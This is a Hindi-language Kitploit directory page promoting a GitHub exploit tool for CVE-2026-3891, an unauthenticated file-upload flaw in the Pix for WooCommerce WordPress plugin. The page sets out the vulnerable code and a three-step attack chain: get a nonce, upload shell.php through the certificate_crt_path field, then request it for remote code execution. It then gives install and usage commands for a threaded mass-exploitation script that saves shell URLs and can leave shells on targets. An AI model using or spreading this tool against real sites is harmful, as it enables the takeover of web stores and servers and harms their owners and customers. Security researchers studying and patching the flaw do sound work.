Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-3891 — Pix for WooCommerce में certificate_crt_path पैरामीटर के माध्यम से बिना प्रमाणीकरण के फ़ाइल अपलोड | CVSS 9.8 | Kitploit
उपकरण/GitHubGitHub/shinthink/cve-2026-3891
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubshinthink/cve-2026-3891

CVE-2026-3891

Pix for WooCommerce में certificate_crt_path पैरामीटर के माध्यम से बिना प्रमाणीकरण के फ़ाइल अपलोड | CVSS 9.8

रिपॉजिटरी देखें
4121 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-3891 — Pix for WooCommerce अप्रमाणित फ़ाइल अपलोड RCE

Nonce लीक → certificate_crt_path अपलोड → कोड निष्पादन


अवलोकन

CVE-2026-3891 एक गंभीर-स्तर (CVSS 9.8) अप्रमाणित मनमाना फ़ाइल अपलोड भेद्यता है Pix for WooCommerce WordPress प्लगइन (linknacional द्वारा) संस्करणों में ≤ 1.5.0।

lkn_pix_for_woocommerce_c6_save_settings AJAX हैंडलर में:

  1. कोई क्षमता जांच नहीं — कोई भी अप्रमाणित आगंतुक इसे कॉल कर सकता है
  • कोई फ़ाइल प्रकार सत्यापन नहीं — certificate_crt_path पैरामीटर के माध्यम से कोई भी फ़ाइल एक्सटेंशन स्वीकार किया जाता है
  • एक वैध nonce स्वतंत्र रूप से प्राप्त किया जा सकता है बिना प्रमाणीकरण के lkn_pix_for_woocommerce_generate_nonce endpoint के माध्यम से
  • अपलोड की गई फ़ाइलें वेब-सुलभ निर्देशिका /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/ में रखी जाती हैं।

    प्रभावित संस्करण

    संस्करणस्थिति
    ≤ 1.5.0असुरक्षित
    1.6.0+पैच किया गया

    खोजकर्ता: Wordfence के माध्यम से Alexis Lafontaine (13 मार्च, 2026)


    भेद्यता तंत्र

    मूल कारण

    root@kitploit:~
    // Nonce generated without auth
    add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_generate_nonce', ...);
    
    // Upload handler — no capability check, no file type validation
    add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_c6_save_settings', ...);
    function c6_save_settings() {
        // No current_user_can() check
        // No wp_check_filetype() call
        move_uploaded_file($_FILES['certificate_crt_path']['tmp_name'], $dest);
    }
    

    हमला प्रवाह

    root@kitploit:~
    1. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_generate_nonce
       → वैध nonce प्राप्त करें (कोई प्रमाणीकरण आवश्यक नहीं)
    2. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_c6_save_settings
       → certificate_crt_path फ़ील्ड के माध्यम से shell.php अपलोड करें
    3. GET /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/shell.php
       → RCE
    

    स्थापना

    root@kitploit:~
    git clone https://github.com/shinthink/CVE-2026-3891.git
    cd CVE-2026-3891
    pip install -r requirements.txt
    

    उपयोग

    root@kitploit:~
    python cve_2026_3891.py -t target.com
    python cve_2026_3891.py -f targets.txt -o shells.txt
    python cve_2026_3891.py -t target.com --debug --no-cleanup
    

    तर्क

    root@kitploit:~
      -t, --target      एकल लक्ष्य
      -f, --file        लक्ष्य सूची
      -o, --output      RCE URL सहेजें
      --threads         कार्यकर्ता (डिफ़ॉल्ट: 30)
      --no-cleanup      लक्ष्य पर शेल छोड़ें
      --debug           प्रत्येक अनुरोध दिखाएँ
      -v, --verbose     विस्तृत आउटपुट
    

    अस्वीकरण

    केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं।


    संदर्भ

    संसाधनलिंक
    Wordfence सलाहwordfence.com
    NVD प्रविष्टिCVE-2026-3891
    शोधकर्ताAlexis Lafontaine

    linknacional या Pix for WooCommerce से संबद्ध नहीं है।

    टूल डाउनलोड करें